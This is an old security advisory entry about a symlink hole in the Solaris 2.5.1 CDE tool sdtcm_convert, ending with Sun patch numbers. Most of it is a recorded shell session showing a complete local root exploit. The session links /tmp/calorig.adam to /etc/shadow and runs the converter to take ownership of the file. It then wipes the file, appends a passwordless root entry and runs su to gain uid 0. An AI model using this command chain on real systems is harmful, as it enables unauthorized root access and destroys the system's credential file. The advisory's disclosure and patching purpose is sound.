COMMAND
/usr/dt/bin/sdtcm.convert
SYSTEMS AFFECTED
Solaris 2.5.1
PROBLEM
Adam Morrison <adam@MATH.TAU.AC.IL> one other hole in
sdtcm_convert.
CDE is generally a can of worms.
$Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
Script started on Thu Jul 11 22:15:03 1996
22:15 [wumpus:~] % whoami
adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow
22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
Loading the calendar ...
WARNING!! Data will be lost when converting version 4 data
format back to version 3 data format.
Do you want to continue? (Y/N) [Y] y
Doing conversion ...
Writing out new file ...
Conversion done successfully.
Total number of appointments = 0
Number of one-time appointments converted = 0
Number of repeating appointments converted = 0
Number of one-time appointments pruned = 0
Number of repeating appointments pruned = 0
The original file is saved in /tmp/calorig.adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % chmod 644 /etc/shadow
22:15 [wumpus:~] % cp /dev/null /etc/shadow
cp: overwrite /etc/shadow (y/n)? y
22:15 [wumpus:~] % ls -l /etc/shadow
-rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
22:16 [wumpus:~] % su
# id
uid=0(root) gid=1(other)
# exit
SOLUTION
There is a set of Sun patches that corrects this vulnerability.
They are:
103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)